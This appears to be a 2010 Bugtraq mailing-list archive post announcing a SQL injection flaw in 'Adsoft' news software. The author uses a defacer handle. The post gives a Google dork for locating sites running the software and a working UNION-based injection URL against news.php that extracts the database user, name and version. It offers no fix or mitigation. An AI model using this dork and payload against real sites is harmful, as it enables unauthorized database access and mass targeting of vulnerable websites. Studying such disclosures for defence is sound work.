[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Adsoft Remote Sql Injection Vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Adsoft Remote Sql Injection Vulnerability
From: md.r00t.defacer@xxxxxxxxx
Date: Thu, 4 Nov 2010 01:50:03 -0600

#------------In The Name Of God------------
# Adsoft Remote Sql Injection Vulnerability
###################################
#AUTHOR: md.r00t
#Mail: md.r00t.defacer@xxxxxxxxx
#Forum: http://ajaxtm.com/forum
###################################
#Google D0rk:
# "Powered by AdSOFT"
###################################
# Exploit:
#
 
www.site.com/news.php?id=-999/**/union/**/select/**/1,concat_ws(CHAR(32,58,32),user(),database(),version()),3,4,5,6--
#
####################################
#TNX:
#Aria-Security Team (Persian Security Network),hadihadi(Virangar Security Team),
Ajax Security Team
*****************************************

Prev by Date: Security Advisory for Bugzilla 3.2.8, 3.4.8, 3.6.2, and 3.7.3
Next by Date: BBcode XSS in MiniBB
Previous by thread: Security Advisory for Bugzilla 3.2.8, 3.4.8, 3.6.2, and 3.7.3
Next by thread: BBcode XSS in MiniBB
Index(es):
- Date
- Thread